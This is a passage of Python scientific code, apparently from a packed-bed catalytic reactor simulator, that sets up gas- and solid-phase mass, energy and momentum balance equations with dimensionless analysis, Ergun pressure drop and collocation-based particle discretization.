params1 = (compNo, noLayer, varNoRows, varNoColumns, rNo, zNo)
params2 = (Cif, Tf, processType)
dataYs_Sorted = sortedResult3(
_ConcGasPhase_DiLeVa, _TempGasPhase_DiLeVa, _ConcSolidPhase_DiLeVa, _TempSolidPhase_DiLeVa, params1, params2)
# gas phase
# component concentration [kmol/m^3]
_ConcGasPhase_ReVa = dataYs_Sorted['data1']
# temperature [K]
_TempGasPhase_ReVa = dataYs_Sorted['data2']
# solid phase
# component concentration [kmol/m^3]
_ConcSolidPhase_ReVa = dataYs_Sorted['data3']
# temperature [K]
_TempSolidPhase_ReVa = dataYs_Sorted['data4']
# REVIEW
# convert concentration to mole fraction
_ConcGasPhaseTot = np.sum(_ConcGasPhase_ReVa, axis=0)
_MoFriGasPhase = _ConcGasPhase_ReVa/_ConcGasPhaseTot
# convert concentration to mole fraction
_ConcSolidPhaseTot = np.sum(_ConcSolidPhase_ReVa, axis=0)
_MoFriSolidPhase = _ConcSolidPhase_ReVa/_ConcSolidPhaseTot
# combine
# gas phase
_dataYs_GasPhase = np.concatenate(
(_MoFriGasPhase, _TempGasPhase_ReVa), axis=0)
# solid phase
_MoFriSolidPhase_Reshaped = np.zeros((compNo, varNoColumns))
for j in range(compNo):
_MoFriSolidPhase_Reshaped[j, :] = _MoFriSolidPhase[j]
# set
_dataYs_SolidPhase = np.concatenate(
(_MoFriSolidPhase_Reshaped, _TempSolidPhase_ReVa), axis=0)
#
_dataYs = np.concatenate(
(_dataYs_GasPhase, _dataYs_SolidPhase), axis=0)
# save data
# dataPack.append({
# "successStatus": successStatus,
# "dataYCon": dataYs1GasPhase,
# "dataYTemp": dataYs2GasPhase,
# "dataYs": _dataYs,
# "dataYCons": dataYs1SolidPhase,
# "dataYTemps": dataYs2SolidPhase,
# })
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# plot info
plotTitle = f"Steady-State {processType} Modeling [M14] finished in {elapsed} seconds"
xLabelSet = "Dimensionless Particle Radius"
yLabelSet = "Dimensionless Concentration"
# REVIEW
# *** post-processing results ***
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo], dataList[indexTemp],
dataList[labelIndex_ConcSolidPhase:labelIndex_ConcSolidPhase+compNo], dataList[labelIndex_TempSolidPhase]]
# subplot result
pltc.plots2DSub(dataLists, xLabelSet, yLabelSet, plotTitle)
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM9(y, paramsSet, rampSet=1):
"""
model [static modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
solverMesh: mesh installment
solverMeshSet:
true: normal
false: mesh refinement
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
dzs: differential length list [-]
zR: z ratio
zNoNo: number of nodes in the dense and normal sections
solverSetting:
OrCoClassSetRes: constants of OC methods
reactionRateExpr: reaction rate expressions []
DimensionlessAnalysisParams:
Cif: feed concentration [kmol/m^3]
Tf: feed temperature
vf: feed superficial velocity [m/s]
zf: domain length [m]
Dif: diffusivity coefficient of component [m^2/s]
Cpif: feed heat capacity at constat pressure [kJ/kmol.K] | [J/mol.K]
rf: particle radius [m]
GaMaCoTe0: feed mass convective term of gas phase [kmol/m^3.s]
GaMaDiTe0: feed mass diffusive term of gas phase [kmol/m^3.s]
GaHeCoTe0: feed heat convective term of gas phase [kJ/m^3.s]
GaHeDiTe0, feed heat diffusive term of gas phase [kJ/m^3.s]
SoMaDiTe0: feed mass diffusive term of solid phase [kmol/m^3.s]
SoHeDiTe0: feed heat diffusive term of solid phase [kJ/m^3.s]
ReNu0: Reynolds number
ScNu0: Schmidt number
ShNu0: Sherwood number
PrNu0: Prandtl number
PeNuMa0: mass Peclet number
PeNuHe0: heat Peclet number
MaTrCo: mass transfer coefficient - gas/solid [m/s]
HeTrCo: heat transfer coefficient - gas/solid [J/m^2.s.K]
processType
"""
# parameters
reactionListSorted, reactionStochCoeff, FunParam, DimensionlessAnalysisParams, processType = paramsSet
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# inlet superficial velocity [m/s]
# SuGaVe0 = constBC1['SuGaVe0']
# inlet diffusivity coefficient [m^2]
GaDii0 = constBC1['GaDii0']
# inlet gas thermal conductivity [J/s.m.K]
GaThCoi0 = constBC1['GaThCoi0']
# gas viscosity
GaVii0 = constBC1['GaVii0']
# gas density [kg/m^3]
GaDe0 = constBC1['GaDe0']
# heat capacity at constant pressure [kJ/kmol.K] | [J/mol.K]
GaCpMeanMix0 = constBC1['GaCpMeanMix0']
# gas thermal conductivity [J/s.m.K]
GaThCoMix0 = constBC1['GaThCoMix0']
# mesh setting
meshSetting = FunParam['meshSetting']
# mesh installment
solverMesh = meshSetting['solverMesh']
# mesh refinement
solverMeshSet = meshSetting['solverMeshSet']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# dzs [m]/[-]
dzs = meshSetting['dzs']
# R ratio
zR = meshSetting['zR']
# number of nodes in the dense and normal sections
zNoNo = meshSetting['zNoNo']
# dense
zNoNoDense = zNoNo[0]
# normal
zNoNoNormal = zNoNo[1]
# solver setting
solverSetting = FunParam['solverSetting']
# mass balance equation
DIFF1_C_SET = solverSetting['dFdz']
DIFF2_C_SET_BC1 = solverSetting['d2Fdz2']['BC1']
DIFF2_C_SET_BC2 = solverSetting['d2Fdz2']['BC2']
DIFF2_C_SET_G = solverSetting['d2Fdz2']['G']
# energy balance equation
DIFF1_T_SET = solverSetting['dTdz']
DIFF2_T_SET_BC1 = solverSetting['d2Tdz2']['BC1']
DIFF2_T_SET_BC2 = solverSetting['d2Tdz2']['BC2']
DIFF2_T_SET_G = solverSetting['d2Tdz2']['G']
# number of collocation points
ocN = solverSetting['OrCoClassSetRes']['N']
ocXc = solverSetting['OrCoClassSetRes']['Xc']
ocA = solverSetting['OrCoClassSetRes']['A']
ocB = solverSetting['OrCoClassSetRes']['B']
ocQ = solverSetting['OrCoClassSetRes']['Q']
# init OrCoCatParticle
OrCoCatParticleClassSet = OrCoCatParticleClass(
ocXc, ocN, ocQ, ocA, ocB, varNo)
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# dimensionless analysis params
# feed concentration [kmol/m^3]
Cif = DimensionlessAnalysisParams['Cif']
# feed temperature
Tf = DimensionlessAnalysisParams['Tf']
# feed superficial velocity [m/s]
vf = DimensionlessAnalysisParams['vf']
# domain length [m]
zf = DimensionlessAnalysisParams['zf']
# particle radius [m]
rf = DimensionlessAnalysisParams['rf']
# diffusivity coefficient of component [m^2/s]
Dif = DimensionlessAnalysisParams['Dif']
# feed heat capacity at constat pressure
Cpif = DimensionlessAnalysisParams['Cpif']
# feed mass convective term of gas phase [kmol/m^3.s]
GaMaCoTe0 = DimensionlessAnalysisParams['GaMaCoTe0']
# feed mass diffusive term of gas phase [kmol/m^3.s]
GaMaDiTe0 = DimensionlessAnalysisParams['GaMaDiTe0']
# feed heat convective term of gas phase [kJ/m^3.s]
GaHeCoTe0 = DimensionlessAnalysisParams['GaHeCoTe0']
# feed heat diffusive term of gas phase [kJ/m^3.s]
GaHeDiTe0 = DimensionlessAnalysisParams['GaHeDiTe0']
# feed mass diffusive term of solid phase [kmol/m^3.s]
SoMaDiTe0 = DimensionlessAnalysisParams['SoMaDiTe0']
# feed heat diffusive term of solid phase [kJ/m^3.s]
SoHeDiTe0 = DimensionlessAnalysisParams['SoHeDiTe0']
# Reynolds number
ReNu = DimensionlessAnalysisParams['ReNu0']
# Schmidt number
ScNu = DimensionlessAnalysisParams['ScNu0']
# Sherwood number
ShNu = DimensionlessAnalysisParams['ShNu0']
# Prandtl number
PrNu = DimensionlessAnalysisParams['PrNu0']
# mass Peclet number
PeNuMa0 = DimensionlessAnalysisParams['PeNuMa0']
# heat Peclet number
PeNuHe0 = DimensionlessAnalysisParams['PeNuHe0']
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = DimensionlessAnalysisParams['MaTrCo']
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = DimensionlessAnalysisParams['HeTrCo']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# effective heat capacity at constant pressure
SoCpMeanMixEff = np.zeros(rNo)
# dimensionless analysis
SoCpMeanMixEff_ReVa = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [mol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# dimensionless analysis
CoSpi_ReVa = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# dimensionless analysis
CosSpi_r_ReVa = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer -
1] if processType != "iso-thermal" else np.repeat([[0], [0]], zNo).reshape((varNoRows, varNoColumns))
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = _SpCoi_z # max(_SpCoi_z, CONST.EPS_CONST)
# REVIEW
# dimensionless analysis: real value
SpCoi0_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CoSpi_ReVa[i] = rmtUtil.calRealDiLessValue(
CoSpi[i], SpCoi0_Set)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# dimensionless analysis: real value
CoSp_ReVa = np.sum(CoSpi_ReVa)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
# max(_CosSpi_z, CONST.EPS_CONST)
CosSpi_r[r][i] = _CosSpi_z
# REVIEW
# dimensionless analysis: real value
SpCoi0_r_Set = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
SpCoi0)
CosSpi_r_ReVa[r][i] = rmtUtil.calRealDiLessValue(
CosSpi_r[r][i], SpCoi0_r_Set)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# dimensionless analysis: real value
CosSp_r_ReVa = np.sum(CosSpi_r_ReVa, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# dimensionless analysis
CosSpi_cat_DiLeVa = CosSpi_r[0, :]
# temperature [K]
T = T_z[z]
T_ReVa = rmtUtil.calRealDiLessValue(T, Tf, "TEMP")
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
Ts_r_ReVa = rmtUtil.calRealDiLessValue(Ts_r, Tf, "TEMP")
# REVIEW
print("z: ", z, "T_ReVa: ", T_ReVa, " Ts_r_ReVa: ", Ts_r_ReVa)
# pressure [Pa]
P = P_z[z]
# FIXME
# velocity
# dimensionless value
# v = v_z[z]
v = 1
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi_ReVa))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r_ReVa)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# dimensionless analysis
SuGaVe_ReVa = rmtUtil.calRealDiLessValue(SuGaVe, SuGaVe0)
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = calMolarFlowRate(CoSp_ReVa, SuGaVe_ReVa, CrSeAr)
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp_ReVa*1000)
# GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# dimensionless value
GaDe_DiLeVa = rmtUtil.calDiLessValue(GaDe, GaDe0)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe_ReVa/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe_ReVa**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# FIXME
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVii = GaVii0 if MODEL_SETTING['GaVii'] == "FIX" else calTest()
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
# FIXME
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# solid gas thermal conductivity
SoThCoMix0 = GaThCoMix0
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = GaThCoi0 if MODEL_SETTING['GaThCoi'] == "FIX" else calTest(
)
# dimensionless
GaThCoi_DiLe = GaThCoi/GaThCoi0
# FIXME
# mixture thermal conductivity - gas phase [J/s.m.K]
GaThCoMix = GaThCoMix0
# dimensionless analysis
GaThCoMix_DiLeVa = GaThCoMix/GaThCoMix0
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = GaThCoMix0
# dimensionless analysis
SoThCoMix_DiLeVa = SoThCoMix/SoThCoMix0
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# dimensionless analysis
GaThCoEff_DiLeVa = BeVoFr*GaThCoMix_DiLeVa
# FIXME
# effective thermal conductivity - solid phase [J/s.m.K]
# assume identical to gas phase
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
# SoThCoEff = SoThCoMix*((1 - CaPo)/CaTo)
SoThCoEff = CaPo*SoThCoMix
# dimensionless analysis
# SoThCoEff_DiLeVa = GaThCoMix_DiLeVa*((1 - CaPo)/CaTo)
SoThCoEff_DiLeVa = CaPo*SoThCoMix_DiLeVa
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
GaDii = GaDii0 if MODEL_SETTING['GaDii'] == "FIX" else calTest()
# dimensionless analysis
GaDii_DiLeVa = GaDii/GaDii0
# effective diffusivity coefficient - gas phase
GaDiiEff = GaDii*BeVoFr
# dimensionless analysis
GaDiiEff_DiLeVa = GaDiiEff/GaDii0
# effective diffusivity - solid phase [m^2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# dimensionless analysis
SoDiiEff_DiLe = (CaPo/CaTo)*GaDii_DiLeVa
# REVIEW
if MODEL_SETTING['MaTrCo'] != "FIX":
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
# loop
loopVars0 = (Ts_r_ReVa[r], P_z[z],
MoFrsi_r[r], CosSpi_r_ReVa[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = rampSet*r0
# REVIEW
# add a ramp term to improve convergence
# component formation rate [kmol/m^3.s]
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, T_ReVa)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# dimensionless analysis
GaCpMeanMix_DiLeVa = rmtUtil.calDiLessValue(
GaCpMeanMix, GaCpMeanMix0)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# dimensionless analysis
GaCpMeanMixEff_DiLeVa = GaCpMeanMix_DiLeVa*BeVoFr
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff_ReVa[r] = CosSp_r_ReVa[r] * \
SoCpMeanMix[r]*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
if MODEL_SETTING['HeTrCo'] != "FIX":
### dimensionless numbers ###
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
# Ua = U*a
# external heat [kJ/m^3.s]
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T_ReVa, U, a, 'kJ/m^3.s')
# NOTE
# # mass transfer between
# for i in range(compNo):
# ### gas phase ###
# # mass balance (forward difference)
# # concentration [kmol/m^3]
# # central
# Ci_c = SpCoi_z[i][z]
# # concentration in the catalyst surface [kmol/m^3]
# # CosSpi_cat
# # dimensionless analysis: real value
# Ci_f = SpCoi0[i] if MODEL_SETTING['GaMaCoTe0'] != "MAX" else np.max(
# SpCoi0)
# # inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*Ci_f*(Ci_c - CosSpi_cat_DiLeVa[i])
# # total mass transfer between gas and solid phases [kmol/m^3]
# ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# # next node
# T_f = T_z[z+1]
# # previous node
# T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
# elif z == zNo - 1:
# # BC2
# # previous node
# T_b = T_z[z - 1]
# # next node
# T_f = 0
# else:
# # interior nodes
# T_b = T_z[z-1]
# # next node
# T_f = T_z[z+1]
# dxdt_v_T = (T_z[z] - T_b)/dz
# # CoSp x 1000
# # OvR x 1000
# dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
# ((1/T_z[z])*dxdt_P - (P_z[z]/T_z[z]**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
# FIXME
# v_z[z+1] = dxdt_v*dz + v_z[z]
# v_z[z+1] = v
# FIXME
v_z[z+1] = v_z[z]
# dimensionless analysis
v_z_DiLeVa = rmtUtil.calDiLessValue(v_z[z+1], vf)
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# bulk temperature [K]
T_c = T_z[z]
# REVIEW
# gas-solid interface BC
# concentration [m/s]*[m^2/s]=[1/m]
# betaC = PaRa*(MaTrCo/SoDiiEff)
# temperature
# betaT = -1*((HeTrCo*PaRa)/SoThCoEff)
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
for i in range(compNo):
# concentration []
# bulk species
Ci_c = SpCoi_z[i][z]
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# REVIEW
### gas phase ###
# check BC
if z == 0 and solverMeshSet is True:
# NOTE
# BC1 (normal)
BC1_C_1 = PeNuMa0[i]*dz
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dz, DIFF1_C_SET)
# d2Fdz2
d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dz, DIFF2_C_SET_BC1)
elif z == 0 and solverMeshSet is False:
# NOTE
# BC1 (dense)
# i=0 is discretized based on inlet
# i=1
BC1_C_1 = PeNuMa0[i]*dzs[z]
BC1_C_2 = 1/BC1_C_1
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_ff = SpCoi_z[i][z+2]
# backward
# GaDii_DiLeVa = 1
Ci_0 = 1 if MODEL_SETTING['GaMaCoTe0'] != "MAX" else SpCoi0[i]/np.max(
SpCoi0)
Ci_b = (Ci_0 + BC1_C_2*Ci_f)/(BC1_C_2 + 1)
Ci_bb = 0
# function value
dFdz_C = [Ci_b, Ci_c, Ci_f]
d2Fdz2_C = [Ci_bb, Ci_b, Ci_c, Ci_f, Ci_ff]
# REVIEW
### uniform nodes ###
# dFdz
dCdz = FiDiDerivative1(dFdz_C, dzs[z], DIFF1_C_SET)
# d2Fdz2
# d2Cdz2 = FiDiDerivative2(d2Fdz2_C, dzs[z], DIFF2_C_SET_BC1)
### non-uniform nodes ###
# R value
_zR_b = 0
_zR_c = dzs[z]/dzs[z-1]
